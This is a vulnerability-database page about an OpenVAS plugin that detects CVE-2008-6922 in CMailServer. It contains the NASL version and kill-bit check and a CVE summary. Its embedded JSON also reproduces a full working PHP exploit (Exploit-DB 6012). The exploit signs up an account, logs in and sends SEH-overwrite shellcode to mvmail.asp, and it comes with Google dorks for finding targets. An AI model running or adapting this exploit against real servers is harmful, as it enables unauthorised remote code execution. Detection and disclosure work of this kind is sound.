Search...

CMailServer ActiveX Control Multiple Buffer Overflow Vulnerabilities

2009-08-20T00:00:00

ID OPENVAS:1361412562310900918
Type openvas
Reporter Copyright (C) 2009 SecPod
Modified 2018-11-30T00:00:00

Description

This host is installed with CMailServer ActiveX Control and is prone to Multiple Buffer Overflow vulnerabilities.

                                        
                                            ###############################################################################
# OpenVAS Vulnerability Test
# $Id: secpod_cmailserver_activex_mult_bof_vuln.nasl 12608 2018-11-30 17:27:57Z cfischer $
#
# CMailServer ActiveX Control Multiple Buffer Overflow Vulnerabilities
#
# Authors:
# Nikita MR &lt;rnikita@secpod.com&gt;
#
# Copyright:
# Copyright (c) 2009 SecPod, http://www.secpod.com
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.900918");
  script_version("$Revision: 12608 $");
  script_tag(name:"last_modification", value:"$Date: 2018-11-30 18:27:57 +0100 (Fri, 30 Nov 2018) $");
  script_tag(name:"creation_date", value:"2009-08-20 09:27:17 +0200 (Thu, 20 Aug 2009)");
  script_tag(name:"cvss_base", value:"9.3");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:C/I:C/A:C");
  script_cve_id("CVE-2008-6922");
  script_bugtraq_id(30098);
  script_name("CMailServer ActiveX Control Multiple Buffer Overflow Vulnerabilities");

  script_xref(name:"URL", value:"http://secunia.com/advisories/30940");
  script_xref(name:"URL", value:"http://www.milw0rm.com/exploits/6012");
  script_xref(name:"URL", value:"http://xforce.iss.net/xforce/xfdb/43594");

  script_tag(name:"qod_type", value:"executable_version");
  script_category(ACT_GATHER_INFO);
  script_copyright("Copyright (C) 2009 SecPod");
  script_family("SMTP problems");
  script_dependencies("smb_reg_service_pack.nasl", "secpod_cmailserver_detect.nasl");
  script_require_ports(139, 445);
  script_mandatory_keys("CMailServer/Ver");
  script_tag(name:"impact", value:"This issue can be exploited by sending a specially crafted POST
request to mvmail.asp with an overly long 'indexOfMail' parameter to execute
arbitrary code on the affected system.");
  script_tag(name:"affected", value:"CMailServer version 5.4.6 and prior.");
  script_tag(name:"insight", value:"A boundary error occurs in CMailServer POP3 Class ActiveX
control (CMailCOM.dll) while handling arguments passed to the 'MoveToFolder()'
method.");
  script_tag(name:"summary", value:"This host is installed with CMailServer ActiveX Control and is
prone to Multiple Buffer Overflow vulnerabilities.");
  script_tag(name:"solution", value:"No known solution was made available for at least one year since the disclosure
  of this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to a newer
  release, disable respective features, remove the product or replace the product by another one.");
  script_tag(name:"solution_type", value:"WillNotFix");
  exit(0);
}


include("smb_nt.inc");
include("version_func.inc");
include("secpod_activex.inc");
include("secpod_smb_func.inc");

if(!get_kb_item("SMB/WindowsVersion")){
  exit(0);
}

cmailVer = get_kb_item("CMailServer/Ver");
if(isnull(cmailVer)){
  exit(0);
}

if(version_is_less_equal(version:cmailVer, test_version:"5.4.6"))
{
  dllPath = registry_get_sz(key:"SOFTWARE\Microsoft\Windows\CurrentVersion"+
                      "\Uninstall\CMailServer_is1", item:"InstallLocation");
  if(isnull(dllPath)){
    exit(0);
  }
  share = ereg_replace(pattern:"([A-Z]):.*",replace:"\1$", string:dllPath);
  file = ereg_replace(pattern:"[A-Z]:(.*)",replace:"\1", string:dllPath +
                                                          "\CMailCOM.dll");
  dllVer = GetVer(share:share, file:file);
  if(version_is_less_equal(version:dllVer, test_version:"1.0.0.1"))
  {
    if((is_killbit_set(clsid:"{6971D9B8-B53E-4C25-A414-76199768A592}") == 0) ||
       (is_killbit_set(clsid:"{0609792F-AB56-4CB6-8909-19CDF72CB2A0}") == 0)){
      security_message(port:0);
    }
  }
}

JSON Vulners Source

Initial Source

{"id": "OPENVAS:1361412562310900918", "type": "openvas", "bulletinFamily": "scanner", "title": "CMailServer ActiveX Control Multiple Buffer Overflow Vulnerabilities", "description": "This host is installed with CMailServer ActiveX Control and is\nprone to Multiple Buffer Overflow vulnerabilities.", "published": "2009-08-20T00:00:00", "modified": "2018-11-30T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310900918", "reporter": "Copyright (C) 2009 SecPod", "references": ["http://xforce.iss.net/xforce/xfdb/43594", "http://secunia.com/advisories/30940", "http://www.milw0rm.com/exploits/6012"], "cvelist": ["CVE-2008-6922"], "lastseen": "2019-05-29T18:40:20", "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-6922"]}, {"type": "exploitdb", "idList": ["EDB-ID:6012"]}, {"type": "openvas", "idList": ["OPENVAS:900918"]}], "modified": "2019-05-29T18:40:20", "rev": 2}, "score": {"value": 9.3, "vector": "NONE", "modified": "2019-05-29T18:40:20", "rev": 2}, "vulnersScore": 9.3}, "pluginID": "1361412562310900918", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_cmailserver_activex_mult_bof_vuln.nasl 12608 2018-11-30 17:27:57Z cfischer $\n#\n# CMailServer ActiveX Control Multiple Buffer Overflow Vulnerabilities\n#\n# Authors:\n# Nikita MR <rnikita@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2009 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.900918\");\n script_version(\"$Revision: 12608 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-30 18:27:57 +0100 (Fri, 30 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-08-20 09:27:17 +0200 (Thu, 20 Aug 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2008-6922\");\n script_bugtraq_id(30098);\n script_name(\"CMailServer ActiveX Control Multiple Buffer Overflow Vulnerabilities\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/30940\");\n script_xref(name:\"URL\", value:\"http://www.milw0rm.com/exploits/6012\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/43594\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 SecPod\");\n script_family(\"SMTP problems\");\n script_dependencies(\"smb_reg_service_pack.nasl\", \"secpod_cmailserver_detect.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"CMailServer/Ver\");\n script_tag(name:\"impact\", value:\"This issue can be exploited by sending a specially crafted POST\nrequest to mvmail.asp with an overly long 'indexOfMail' parameter to execute\narbitrary code on the affected system.\");\n script_tag(name:\"affected\", value:\"CMailServer version 5.4.6 and prior.\");\n script_tag(name:\"insight\", value:\"A boundary error occurs in CMailServer POP3 Class ActiveX\ncontrol (CMailCOM.dll) while handling arguments passed to the 'MoveToFolder()'\nmethod.\");\n script_tag(name:\"summary\", value:\"This host is installed with CMailServer ActiveX Control and is\nprone to Multiple Buffer Overflow vulnerabilities.\");\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the disclosure\n of this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to a newer\n release, disable respective features, remove the product or replace the product by another one.\");\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_activex.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(!get_kb_item(\"SMB/WindowsVersion\")){\n exit(0);\n}\n\ncmailVer = get_kb_item(\"CMailServer/Ver\");\nif(isnull(cmailVer)){\n exit(0);\n}\n\nif(version_is_less_equal(version:cmailVer, test_version:\"5.4.6\"))\n{\n dllPath = registry_get_sz(key:\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\"+\n \"\\Uninstall\\CMailServer_is1\", item:\"InstallLocation\");\n if(isnull(dllPath)){\n exit(0);\n }\n share = ereg_replace(pattern:\"([A-Z]):.*\",replace:\"\\1$\", string:dllPath);\n file = ereg_replace(pattern:\"[A-Z]:(.*)\",replace:\"\\1\", string:dllPath +\n \"\\CMailCOM.dll\");\n dllVer = GetVer(share:share, file:file);\n if(version_is_less_equal(version:dllVer, test_version:\"1.0.0.1\"))\n {\n if((is_killbit_set(clsid:\"{6971D9B8-B53E-4C25-A414-76199768A592}\") == 0) ||\n (is_killbit_set(clsid:\"{0609792F-AB56-4CB6-8909-19CDF72CB2A0}\") == 0)){\n security_message(port:0);\n }\n }\n}\n", "naslFamily": "SMTP problems"}

{"cve": [{"lastseen": "2021-02-02T05:35:21", "description": "Multiple stack-based buffer overflows in CMailCOM.dll in CMailServer 5.4.6 allow remote attackers to execute arbitrary code via a long argument to the (1) CreateUserPath, (2) Logout, (3) DeleteMailByUID, (4) MoveToInbox, (5) MoveToFolder, (6) DeleteMailEx, (7) GetMailDataEx, (8) SetReplySign, (9) SetForwardSign, and (10) SetReadSign methods, which are not properly handled by (a) the POP3 Class ActiveX control (CMailCom.POP3); or a long argument to the (11) AddAttach, (12) SetSubject, (13) SetBcc, (14) SetBody, (15) SetCc, (16) SetFrom, (17) SetTo, and (18) SetFromUID methods, which are not properly handled by the Class ActiveX control (CMailCOM.SMTP), as demonstrated via the indexOfMail parameter to mwmail.asp.", "edition": 4, "cvss3": {}, "published": "2009-08-10T18:30:00", "title": "CVE-2008-6922", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": true, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-6922"], "modified": "2017-09-29T01:33:00", "cpe": ["cpe:/a:youngzsoft:cmailserver:5.4.6"], "id": "CVE-2008-6922", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-6922", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:youngzsoft:cmailserver:5.4.6:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2017-10-30T10:55:21", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-6922"], "description": "This host is installed with CMailServer ActiveX Control and is\nprone to Multiple Buffer Overflow vulnerabilities.", "modified": "2017-10-26T00:00:00", "published": "2009-08-20T00:00:00", "id": "OPENVAS:900918", "href": "http://plugins.openvas.org/nasl.php?oid=900918", "type": "openvas", "title": "CMailServer ActiveX Control Multiple Buffer Overflow Vulnerabilities", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_cmailserver_activex_mult_bof_vuln.nasl 3898 2009-08-19 12:45:380Z aug \n#\n# CMailServer ActiveX Control Multiple Buffer Overflow Vulnerabilities\n#\n# Authors:\n# Nikita MR <rnikita@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2009 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_solution = \"No solution or patch was made available for at least one year\nsince disclosure of this vulnerability. Likely none will be provided anymore.\nGeneral solution options are to upgrade to a newer release, disable respective\nfeatures, remove the product or replace the product by another one.\n\nA workaround is to set the Killbit for the vulnerable CLSID\nhttp://support.microsoft.com/kb/240797\";\n\ntag_impact = \"This issue can be exploited by sending a specially crafted POST\nrequest to mvmail.asp with an overly long 'indexOfMail' parameter to execute\narbitrary code on the affected system.\";\n\ntag_affected = \"CMailServer version 5.4.6 and prior.\";\n\ntag_insight = \"A boundary error occurs in CMailServer POP3 Class ActiveX\ncontrol (CMailCOM.dll) while handling arguments passed to the 'MoveToFolder()'\nmethod.\";\n\ntag_summary = \"This host is installed with CMailServer ActiveX Control and is\nprone to Multiple Buffer Overflow vulnerabilities.\";\n\nif(description)\n{\n script_id(900918);\n script_version(\"$Revision: 7573 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-10-26 11:18:50 +0200 (Thu, 26 Oct 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-08-20 09:27:17 +0200 (Thu, 20 Aug 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2008-6922\");\n script_bugtraq_id(30098);\n script_name(\"CMailServer ActiveX Control Multiple Buffer Overflow Vulnerabilities\");\n\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/30940\");\n script_xref(name : \"URL\" , value : \"http://www.milw0rm.com/exploits/6012\");\n script_xref(name : \"URL\" , value : \"http://xforce.iss.net/xforce/xfdb/43594\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 SecPod\");\n script_family(\"SMTP problems\");\n script_dependencies(\"secpod_reg_enum.nasl\", \"secpod_cmailserver_detect.nasl\");\n script_mandatory_keys(\"CMailServer/Ver\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_activex.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(!get_kb_item(\"SMB/WindowsVersion\")){\n exit(0);\n}\n\ncmailVer = get_kb_item(\"CMailServer/Ver\");\nif(isnull(cmailVer)){\n exit(0);\n}\n\nif(version_is_less_equal(version:cmailVer, test_version:\"5.4.6\"))\n{\n dllPath = registry_get_sz(key:\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\"+\n \"\\Uninstall\\CMailServer_is1\", item:\"InstallLocation\");\n if(isnull(dllPath)){\n exit(0);\n }\n share = ereg_replace(pattern:\"([A-Z]):.*\",replace:\"\\1$\", string:dllPath);\n file = ereg_replace(pattern:\"[A-Z]:(.*)\",replace:\"\\1\", string:dllPath +\n \"\\CMailCOM.dll\");\n dllVer = GetVer(share:share, file:file);\n # check if CMailCOM.dll version is 1.0.0.1 or prior\n if(version_is_less_equal(version:dllVer, test_version:\"1.0.0.1\"))\n {\n # Check if the Killbits are set\n if((is_killbit_set(clsid:\"{6971D9B8-B53E-4C25-A414-76199768A592}\") == 0) ||\n (is_killbit_set(clsid:\"{0609792F-AB56-4CB6-8909-19CDF72CB2A0}\") == 0)){\n security_message(port:0);\n }\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-01T00:01:47", "description": "CMailServer 5.4.6 (CMailCOM.dll) Remote SEH Overwrite Exploit. CVE-2008-6922. Remote exploit for windows platform", "published": "2008-07-06T00:00:00", "type": "exploitdb", "title": "CMailServer 5.4.6 CMailCOM.dll Remote SEH Overwrite Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-6922"], "modified": "2008-07-06T00:00:00", "id": "EDB-ID:6012", "href": "https://www.exploit-db.com/exploits/6012/", "sourceData": "<?php\n /*\n CMailServer 5.4.6 mvmail.asp/CMailCOM.dll remote seh overwrite\n\tproof of concept exploit\n\n by Nine:Situations:Group::bruiser\n\n our site: http://retrogod.altervista.org/\n\n software site: http://www.youngzsoft.net/cmailserver/\n\n Google dorks:\n intitle:\"Mail Server CMailServer WebMail\"\n intitle:\"Mail Server CMailServer WebMail 5.4.6\"\n\n Some notes:\n This server provides a IIS/webmail interface and a registered component\n\tvulnerable to multiple buffer overflows, among the others, the\n\tCMailCom.POP3 class with CLSID 6971D9B8-B53E-4C25-A414-76199768A592.\n This class is called by various ASP scripts inside the main folder...\n\tI found this clear vector, look mwmail.asp , lines 25-35:\n\n ...\n\t Set objPOP3 = CreateObject(\"CMailCOM.POP3.1\")\n objPOP3.Login Session(\"User\"), Session(\"Pass\")\n Session(\"LoginSuccess\") = objPOP3.LoginSuccess\n If Session(\"LoginSuccess\") = 1 Then\n\t set rs=Server.createobject(\"adodb.recordset\")\n \t rs.open \"mailfolder\",Conn,1,3\n\t i = 0\n\t arrString = Split(Request(\"indexOfMail\"), \";\", -1, 1)\n\t While Len(arrString(i)) <> 0\n\t strUID = arrString(i)\n\t objPOP3.MoveToFolder strUID ' <---------------- bof\n\t ...\n\n\tBy attaching olly to the w3wp.exe sub-process you will see the usual\n\tdump with ecx and eip owned, with a buffer of approxymately 13000 chars.\n\n Exploitation is post-auth but you can have a user account by simply\n\tbrowsing the signup.asp page, enabled by default.\n Calc.exe will run with NETWORK SERVICE privilege, check tasks. Note\n\tthat 4-5 failed exploit attempts may result in IIS \"Service\n\tUnavailiable\" message.\n\n Other attacks are possible, see a list of locally overflowable\n methods:\n CreateUserPath, Logout, DeleteMailByUID, MoveToInbox, MoveToFolder,\n\tDeleteMailEx, GetMailDataEx, SetReplySign, SetForwardSign, SetReadSign.\n\tNote also that remotely there's some kind of validation (ex. you can\n\tnot have a username with a length of more than 4000 chars which\n\tcould be used instead to overflow the CreateUserPath method and\n\tyou cannot overflow ex. through the strUID argument) which reduces a lot\n\tthe remote vectors. However, as you can see there's no filter on\n\t\"indexOfMail\" one.\n\n Other notes:\n CMailCOM.SMTP class with CLSID 0609792F-AB56-4CB6-8909-19CDF72CB2A0\n\tis also vulnerable in the following methods:\n AddAttach, SetSubject, SetBcc, SetBody, SetCc, SetFrom,\n SetTo, SetFromUID\n */\n\n error_reporting(7);$host=$argv[1];$path=$argv[2];\n $argv[3] ? $port = (int) $argv[3] : $port = 80;\n print (\"CMailServer 5.4.6 mvmail.asp/CMailCOM.dll remote seh overwrite\\n\".\n \"exploit\\n\".\n \"by Nine:Situations:Group::bookoo\\n\");\n $argv[2] ? print(\"attackin'...\\n\") : die (\"syntax: php \".$argv[0].\" [host] [path] [[port]]\\n\".\n\t \"example: php \".$argv[0].\" 192.168.0.1 /mail/ \\n\".\n\t \" '' php \".$argv[0].\" 192.168.0.1 / 81 \\n\");\n $url = \"http://$host:$port\";\n $win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true : false;\n $win ? dl(\"php_curl.dll\") : dl(\"php_curl.so\");\n\n //borrowed from bookoo\n function send($packet,$out) {\n\n global $url, $data;\n\n\t if (!extension_loaded(\"curl\"){\n\t\t die(\"you need the curl extesion loaded to run...\");\n }\n\t $ch = curl_init();\n curl_setopt($ch, CURLOPT_URL,$url);\n curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);\n curl_setopt($ch, CURLOPT_TIMEOUT, 5);\n curl_setopt($ch, CURLOPT_HEADER, 1);\n curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $packet);\n $data = curl_exec($ch); if (curl_errno($ch)) {\n print curl_error($ch).\"\\n\";\n } else {\n curl_close($ch);\n }\n if ($out) print($data.\"\\n\");\n }\n\n $agent=\"Mozilla/5.0 (Windows; U; Windows NT 5.2; it; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15\";\n //subscribe\n $usr=\"bookoo\";$pwd=\"password\";//new usr username & password, change\n\t$d =\"Signup=1&Account=$usr&Pass=$pwd&RePass=$pwd&UserName=&Comment=User&POP3Mail=%40ieqowieoqw.com\";\n $h =\"POST \".$path.\"signup.asp HTTP/1.0\\r\\nHost: $host\\r\\nUser-Agent: $agent\\r\\nContent-Type: application/x-www-form-urlencoded\\r\\nContent-Length: \".strlen($d).\"\\r\\nConnection: Close\\r\\n\\r\\n$d\";\n\tsend($h,0);\n\t$tmp=explode(\"Set-Cookie: \",$data);\n\tfor ($i=1; $i<count($tmp);$i++){ $tmpi=explode(\" \",$tmp[$i]);$sess=$tmpi[0];$pos=strpos($sess, \"ASPSESSIONID\");\tif ($pos === true) break; echo $sess.\"\\n\";}\n\t//login\n\t$d =\"User=$usr&Pass=$pwd&SaveUserPass=on\";\n $h =\"POST \".$path.\"login.asp HTTP/1.0\\r\\nHost: $host\\r\\nUser-Agent: $agent\\r\\nContent-Type: application/x-www-form-urlencoded\\r\\nContent-Length: \".strlen($d).\"\\r\\nCookie: $sess SaveUserPass=1; Pass=$pwd; User=$usr;\\r\\nConnection: Close\\r\\n\\r\\n$d\";\n \tsend($h,0);\n \t//attack\n //bad chars: \\x3b \\x2f\n # win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=Pex http://metasploit.com\n $shellcode =\n \"\\x2b\\xc9\\x83\\xe9\\xde\\xe8\\xff\\xff\\xff\\xff\\xc0\\x5e\\x81\\x76\\x0e\\xcf\".\n \"\\x67\\x5f\\x11\\x83\\xee\\xfc\\xe2\\xf4\\x33\\x8f\\x1b\\x11\\xcf\\x67\\xd4\\x54\".\n \"\\xf3\\xec\\x23\\x14\\xb7\\x66\\xb0\\x9a\\x80\\x7f\\xd4\\x4e\\xef\\x66\\xb4\\x58\".\n \"\\x44\\x53\\xd4\\x10\\x21\\x56\\x9f\\x88\\x63\\xe3\\x9f\\x65\\xc8\\xa6\\x95\\x1c\".\n \"\\xce\\xa5\\xb4\\xe5\\xf4\\x33\\x7b\\x15\\xba\\x82\\xd4\\x4e\\xeb\\x66\\xb4\\x77\".\n \"\\x44\\x6b\\x14\\x9a\\x90\\x7b\\x5e\\xfa\\x44\\x7b\\xd4\\x10\\x24\\xee\\x03\\x35\".\n \"\\xcb\\xa4\\x6e\\xd1\\xab\\xec\\x1f\\x21\\x4a\\xa7\\x27\\x1d\\x44\\x27\\x53\\x9a\".\n \"\\xbf\\x7b\\xf2\\x9a\\xa7\\x6f\\xb4\\x18\\x44\\xe7\\xef\\x11\\xcf\\x67\\xd4\\x79\".\n \"\\xf3\\x38\\x6e\\xe7\\xaf\\x31\\xd6\\xe9\\x4c\\xa7\\x24\\x41\\xa7\\x97\\xd5\\x15\".\n \"\\x90\\x0f\\xc7\\xef\\x45\\x69\\x08\\xee\\x28\\x04\\x3e\\x7d\\xac\\x67\\x5f\\x11\";\n $jmp_short=\"\\xeb\\x10\\x90\\x90\";\n\t$seh=\"\\xf1\\xda\\x02\\x10\"; #0x1002DAF1 cmailcom.dll / pop ecx - pop - ret\n $nop=str_repeat(\"\\x90\",12648);\n\t$bof= $nop . $jmp_short. $seh . str_repeat(\"\\x90\",24). $shellcode ;\n\t$d=\"sel=aaaa&ToFolder=4&indexOfMail=\".urlencode($bof).\"&mailcount=1&pages=\";\n $h =\"POST \".$path.\"mvmail.asp HTTP/1.0\\r\\nHost: $host\\r\\nUser-Agent: $agent\\r\\nContent-Type: application/x-www-form-urlencoded\\r\\nContent-Length: \".strlen($d).\"\\r\\nCookie: $sess SaveUserPass=1; Pass=$pwd; User=$usr;\\r\\nConnection: Close\\r\\n\\r\\n$d\";\n send($h,1);\n?>\n\n# milw0rm.com [2008-07-06]\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/6012/"}]}